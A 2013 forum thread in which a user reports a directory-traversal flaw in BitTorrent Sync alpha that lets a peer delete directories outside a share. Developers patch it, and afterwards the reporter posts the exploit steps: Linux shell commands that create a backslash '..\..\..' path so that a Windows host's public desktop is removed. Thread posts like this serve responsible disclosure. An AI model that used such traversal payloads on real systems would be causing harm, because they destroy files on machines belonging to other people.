rdebath Posted May 7, 2013 Report Share Posted May 7, 2013 If you have any public shares running now REMOVE THEM.BTSync will delete directories outside the share.[HOWTO Section Deleted]Is should be possible to use this to delete ANY directory on the windows machine.Bad examples are obvious!THIS IS ALPHA SOFTWARE, IT WILL HAVE SERIOUS BUGS.PS: This applies to versions below 1.0.130 Quote Link to comment Share on other sites More sharing options...
Automatic Coding Posted May 7, 2013 Report Share Posted May 7, 2013 May I ask how? Would you have to craft a special packet to send like:-Please remove ..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\Drivers\etc\hostsOr can you literally just say:-Please remove C:\Windows\System32\Drivers\etc\hostsOr what? Quote Link to comment Share on other sites More sharing options...
thequickbrownfox Posted May 7, 2013 Report Share Posted May 7, 2013 Downloaded the windows client today, did a few searches, found the Short, insecure "secrets" thread, and the cats secret (R27WAH4LQCGDFOGS7NLQYLQPXW5TRCW5) which I put in a New Folder on my desktop. After an hour or two of downloading, lots of cat pictures, I noticed a folder called "Hello" being created and deleted on my desktop. It didn't contain anything but it's very presence indicates a glitch that allows somebody to create/delete files/folders one directory higher than the one they're linked to.Is this the security issue OP describes? I have shut down and uninstalled Sync. Quote Link to comment Share on other sites More sharing options...
MRACHINI Posted May 7, 2013 Report Share Posted May 7, 2013 did you have by any chance "enable debug logging" on ? Quote Link to comment Share on other sites More sharing options...
rdebath Posted May 7, 2013 Author Report Share Posted May 7, 2013 May I ask how? Would you have to craft a special packet to send like:-Please remove ..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\Drivers\etc\hostsOr can you literally just say:-Please remove C:\Windows\System32\Drivers\etc\hostsOr what?It's kinda like the first one, no absolute paths, but you don't have to decrypt any packets to do it. The "exploit code" is very very short.Too short for me to give too many hints, without giving people a chance to see this thread. Quote Link to comment Share on other sites More sharing options...
thequickbrownfox Posted May 7, 2013 Report Share Posted May 7, 2013 did you have by any chance "enable debug logging" on ?Not that I was aware of. The OP has replied since giving a bigger clue.LOLHAX anyone?! Quote Link to comment Share on other sites More sharing options...
kos13 Posted May 7, 2013 Report Share Posted May 7, 2013 This issue will be fixed today. Thank you for reporting. Quote Link to comment Share on other sites More sharing options...
kos13 Posted May 7, 2013 Report Share Posted May 7, 2013 Please upgrade to latest build:http://syncapp.bittorrent.com/1.0.130/ Quote Link to comment Share on other sites More sharing options...
crash893 Posted May 7, 2013 Report Share Posted May 7, 2013 Im on 1.0.116 and when i click check for update it says im good? whats the deal? Quote Link to comment Share on other sites More sharing options...
GreatMarko Posted May 7, 2013 Report Share Posted May 7, 2013 Im on 1.0.116 and when i click check for update it says im good? whats the deal?New builds are presently announced on the forum in the first instance, and will then become available through the "Check for update" button/auto update function at a later stage.The download on the main website has also been updated to build 1.0.130 Quote Link to comment Share on other sites More sharing options...
rdebath Posted May 7, 2013 Author Report Share Posted May 7, 2013 Version 1.0.130 Looks good.Though the windows client seems to get stuck if you give it bad file names. Quote Link to comment Share on other sites More sharing options...
ojchase Posted May 9, 2013 Report Share Posted May 9, 2013 Thanks to whoever put the link to this page in the cats share. And thanks for getting such a quick fix out! Any additional insight in what was happening or why? Quote Link to comment Share on other sites More sharing options...
rdebath Posted May 9, 2013 Author Report Share Posted May 9, 2013 You're welcome.I'll put the actual problem howto up when they turn on push for the next version; will be soon now. Quote Link to comment Share on other sites More sharing options...
rdebath Posted May 28, 2013 Author Report Share Posted May 28, 2013 Okay, 20 days, not too bad: here and here ⟹ c&p pm[HOWTO Section SHOWN]With a share that has both Linux and Windows 7 hosts on the Linux machine Run these commands:$ mkdir '..\..\..\Users\Public\Desktop'$ echo test > mkdir '..\..\..\Users\Public\Desktop'/Testfile.txtNOTICE the use of backslashes, not forward slashes.The Windows shared desktop directory will be removed.It's contents may be moved to another directory on the machine.Be careful out there! Quote Link to comment Share on other sites More sharing options...
aid85 Posted June 20, 2013 Report Share Posted June 20, 2013 What happen when I update a BTSync installation?Can the sync folders need to be relinked (new secret and new hashing) ?? Quote Link to comment Share on other sites More sharing options...
GreatMarko Posted June 20, 2013 Report Share Posted June 20, 2013 What happen when I update a BTSync installation?Can the sync folders need to be relinked (new secret and new hashing) ??I'm not quite sure how this relates in anyway to this particular thread?!! Please post your questions in a relevant thread, or if no relevant thread already exists in the forum, feel free to create a new one. Your post here bears no relevance to the subject matter of this particular thread, which had - until your post - been dormant for almost a month! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.